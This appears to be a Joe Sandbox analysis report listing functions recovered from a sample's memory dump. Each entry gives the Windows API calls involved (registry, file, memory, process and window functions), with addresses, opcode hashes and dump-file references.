                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A480A570EnumFontsMessageNotifySend
                                                              • String ID:
                                                              • API String ID: 2685184028-0
                                                              • Opcode ID: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                              • Instruction ID: 0ea8e5e95b90053dcc80dc26f94e29a170662e2b3e10ca2db4d961c35622b213
                                                              • Opcode Fuzzy Hash: d5a98fd350b21412a22cf4123539bd0c298e95acb479fbe192b8033f652af546
                                                              • Instruction Fuzzy Hash: 2651A6746001508BD710FF27D9C16963799EB88308B90C6BBA8089F367C77CDD068B9D
                                                              APIs
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DC4C
                                                              • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD48), ref: 0042DCBC
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: QueryValue
                                                              • String ID:
                                                              • API String ID: 3660427363-0
                                                              • Opcode ID: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                              • Instruction ID: 0afc69acb925fd444515a6cbe8b6240f093bd173affdd4b5aabebdcedbe93bcc
                                                              • Opcode Fuzzy Hash: dcaea444aa2693f3151e4f161b8541bd325653ac2cf38fab622dd52302d9ecee
                                                              • Instruction Fuzzy Hash: E0414F71E00529ABDB11DF95D881BAFB7B8AB00714F90846AE800F7241D778AE00CBA9
                                                              APIs
                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DF7C
                                                              • RegCloseKey.ADVAPI32(?,0042DFED,?,00000000,00000000,00000000,00000000,00000000,0042DFE6,?,?,00000008,00000000,00000000,0042E013), ref: 0042DFE0
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CloseEnum
                                                              • String ID:
                                                              • API String ID: 2818636725-0
                                                              • Opcode ID: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                              • Instruction ID: 2fe76ac110d60e281b9c8dcd8425dafac1d5c60e45ccd2ae84570cbaedcb928d
                                                              • Opcode Fuzzy Hash: 18687f4e18b3232f9437fac6e5314fb2332009eed5616211d6a140e10b5cd508
                                                              • Instruction Fuzzy Hash: 52319170F04258AEDB11DFA2DD82BAEB7B9EB48304F91407BE501E7281D6785A01CA2D
                                                              APIs
                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452828
                                                              • GetLastError.KERNEL32(00000000,00000000,?,?,004580B4,00000000,0045809C,?,?,?,00000000,0045284E,?,?,?,00000001), ref: 00452830
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorLastProcess
                                                              • String ID:
                                                              • API String ID: 2919029540-0
                                                              • Opcode ID: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                              • Instruction ID: 3ad6dec6d32dc5e6ab031f6e5884ad9a987dc2d9ff381773f4694f698bcb58b9
                                                              • Opcode Fuzzy Hash: 256024ef10b7bad05e9cca563efcf05eafb457725b2bcd1ab333216967b323f1
                                                              • Instruction Fuzzy Hash: D3117972600208AF8B00DEADDD41DABB7ECEB4E310B10456BFD08E3201D678AE148BA4
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045DB78
                                                              • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045DBBE
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AllocDecompressInitVirtualZ2_bz
                                                              • String ID:
                                                              • API String ID: 3582128297-0
                                                              • Opcode ID: c591b8c5941405e74d55acfd67fbc7d549626fae66aa1c641f6c8592b53a0003
                                                              • Instruction ID: 74c5acd5236c9addbbd8ea855c7208cdd9177de3bf8741c260451bc1481ece49
                                                              • Opcode Fuzzy Hash: c591b8c5941405e74d55acfd67fbc7d549626fae66aa1c641f6c8592b53a0003
                                                              • Instruction Fuzzy Hash: 3111C872A00600BBD324DF658941B96BBE6FF44711F054226E908DB681D7B9B954CBD8
                                                              APIs
                                                              • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                              • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Resource$FindFree
                                                              • String ID:
                                                              • API String ID: 4097029671-0
                                                              • Opcode ID: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                              • Instruction ID: 22447e907da962d806d3eb032de74b702d5affa043e15eb070a4a3d902aeafed
                                                              • Opcode Fuzzy Hash: 020963cbed5d1efe29b5c6b0b84e3d8c20ff6c1b4cf1f3711bef16ed23147c41
                                                              • Instruction Fuzzy Hash: 0001DF71300604AFD710FF69DC92E1B77A9DB8A718711807AF500AB7D0DA79AC0096AD
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                              • 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: A25940CurrentThread
                                                              • String ID:
                                                              • API String ID: 2655091166-0
                                                              • Opcode ID: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                              • Instruction ID: 3b2ca51acea6f31c20bceb620234c512699c69eae89bb1383ecfa3b3ac64bed2
                                                              • Opcode Fuzzy Hash: 4f622a916fb84fb1e9f1f3e222a7611e51385d213cb7cd19795c9b5a33aefee2
                                                              • Instruction Fuzzy Hash: FD013976A04604BFDB06CF6BDC1195ABBE9E789720B22887BEC04D36A0E6355810DE18
                                                              APIs
                                                              • MoveFileA.KERNEL32(00000000,00000000), ref: 00452CAE
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,00452CD4), ref: 00452CB6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorFileLastMove
                                                              • String ID:
                                                              • API String ID: 55378915-0
                                                              • Opcode ID: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                              • Instruction ID: 8cb4f6990e07c72a34a39c3d349ee9eec810a974928c7dd1f8c60ebce1e721cc
                                                              • Opcode Fuzzy Hash: 4a87794495b209091e638427933314290125c3fb15c22ae1653921e41cb98622
                                                              • Instruction Fuzzy Hash: D5014971B00204BB8B11DF799D414AEB7ECEB4A32531045BBFC08E3243EAB84E048558
                                                              APIs
                                                              • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,004527BB), ref: 00452795
                                                              • GetLastError.KERNEL32(00000000,00000000,00000000,004527BB), ref: 0045279D
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CreateDirectoryErrorLast
                                                              • String ID:
                                                              • API String ID: 1375471231-0
                                                              • Opcode ID: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                              • Instruction ID: 7517b5081c7c6af98826394809c6fe2d976c468da5ddf52a6f68070703836f12
                                                              • Opcode Fuzzy Hash: 638905229d0ae290751701005a3127306b10a627987a4e9871fe20b3b513e6c4
                                                              • Instruction Fuzzy Hash: 40F0FC71A04704AFCF00DF759D4199EB7E8DB0E715B5049B7FC14E3242E7B94E1485A8
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045DB36), ref: 0045DC8A
                                                              Strings
                                                              • bzlib: Too much memory requested, xrefs: 0045DC65
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID: bzlib: Too much memory requested
                                                              • API String ID: 4275171209-1500031545
                                                              • Opcode ID: c3e1c39ad75a3a5370c914a189738485a5475e04cfedb7fc15b843b7513de3c5
                                                              • Instruction ID: ce966429dc8c86d2e97082ec5653538842f6424bb6b7678e7399fab0bd5ff452
                                                              • Opcode Fuzzy Hash: c3e1c39ad75a3a5370c914a189738485a5475e04cfedb7fc15b843b7513de3c5
                                                              • Instruction Fuzzy Hash: C6F03072B0011007DB62DEAD88C17CA62958F4935AF180476AF4CDF24BD6ACDD84D3AC
                                                              APIs
                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                              • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: CursorLoad
                                                              • String ID:
                                                              • API String ID: 3238433803-0
                                                              • Opcode ID: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                              • Instruction ID: c8375b04fab070422f53c3d6524130e38f027298e82d6ab835706982cf041ecc
                                                              • Opcode Fuzzy Hash: 57390d314a1cb7161e6ddc30cf2ec12f57c29d9a020bc84e90da4252d8f033e1
                                                              • Instruction Fuzzy Hash: 0FF0A711704114AADA105D7E6CC0E2B7268DB91B36B6103BBFA3AD72D1C62E1D41457D
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00008000), ref: 0042E3AE
                                                              • LoadLibraryA.KERNEL32(00000000,00000000,0042E3F8,?,00000000,0042E416,?,00008000), ref: 0042E3DD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLibraryLoadMode
                                                              • String ID:
                                                              • API String ID: 2987862817-0
                                                              • Opcode ID: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                              • Instruction ID: 98bcbcc3e9aaf4c66058534b39987ccdd7eb12bd14468eaf88ad72af9e5505e3
                                                              • Opcode Fuzzy Hash: 7795cc8daa252176d65de3d8f3118caac988bfa791d53a68a28aad838e50b78c
                                                              • Instruction Fuzzy Hash: D5F05E70A14744BEDF119F779C6282ABAACE749B1179248B6F810A3691E67D48108928
                                                              APIs
                                                              • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                              • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ClassInfo
                                                              • String ID:
                                                              • API String ID: 3534257612-0
                                                              • Opcode ID: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                              • Instruction ID: dc9e2acc6f173dd0cc3aa24d84b637cb0067f0ccc6b7cec6a0fcec59befe77f5
                                                              • Opcode Fuzzy Hash: 0cefddb0d68ec1ee3d6e09aa9ac37d408dcb608ad702880eba3eeb66fdb88c2a
                                                              • Instruction Fuzzy Hash: 22E012B26015155ADB10DB999D81EE326DCDB09310B110167BE14CA246D764DD005BA4
                                                              APIs
                                                              • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 004508FA
                                                              • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,004703F1,?,00000000), ref: 00450902
                                                                • Part of subcall function 004506A0: GetLastError.KERNEL32(004504BC,00450762,?,00000000,?,004977FC,00000001,00000000,00000002,00000000,0049795D,?,?,00000005,00000000,00497991), ref: 004506A3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast$FilePointer
                                                              • String ID:
                                                              • API String ID: 1156039329-0
                                                              • Opcode ID: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                              • Instruction ID: a22a311b57bf1dff13f45894218d9c0eaf9de3d8271a2984ee0ce7717fd7efee
                                                              • Opcode Fuzzy Hash: 740b0e3b535324eeb3a184350110131e2b1ae31ce216053ff26069d2cbf9fe72
                                                              • Instruction Fuzzy Hash: E0E012B53042059BFB00FA6599C1F3B63DCDB44315F00447AB984CF187D674CC155B29
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Global$AllocLock
                                                              • String ID:
                                                              • API String ID: 15508794-0
                                                              • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                              • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                              • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                              • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: Virtual$AllocFree
                                                              • String ID:
                                                              • API String ID: 2087232378-0
                                                              • Opcode ID: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                              • Instruction ID: 119661fe7174a079321c86e78af40791ac039b5eb8373b45468023a5ba433726
                                                              • Opcode Fuzzy Hash: 94577317c2bcd4d3a70d22c0b2f2fc78c72c60cff144ef5375d29febf27e2799
                                                              • Instruction Fuzzy Hash: F7F08272A0063067EB60596A4C81B5359859BC5B94F154076FD09FF3E9D6B58C0142A9
                                                              APIs
                                                              • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049B4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: DefaultInfoLoadLocaleStringSystem
                                                              • String ID:
                                                              • API String ID: 1658689577-0
                                                              • Opcode ID: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                              • Instruction ID: ea6634d2ed8774f5e90a5a6f355d63bed973dafba18e0ec7d48b30ffe24ea089
                                                              • Opcode Fuzzy Hash: 2ab4847006ef9acfce6ccb5f1f64a91e8b74d27154e4f0e7901e4566ca639e1f
                                                              • Instruction Fuzzy Hash: C4314375E001199BCF01DF95C8819EEB7B9FF84314F15857BE815AB286E738AE018B98
                                                              APIs
                                                              • SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964394186.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964426115.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964454569.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.2964488817.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_AyiNxJ98mL.jbxd
                                                              Similarity
                                                              • API ID: InfoScroll
                                                              • String ID:
                                                              • API String ID: 629608716-0
                                                              • Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                              • Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
                                                              • Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
                                                              • Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6
                                                              APIs
                                                                • Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
                                                                • Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042EEC0,?,00000001), ref: 0041EF09
                                                              • SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046C756,?,00000000,?,?,0046C968,?,00000000,0046C9DC), ref: 0046C73A
                                                                • Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
                                                                • Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.2964270280.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.2964241219.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
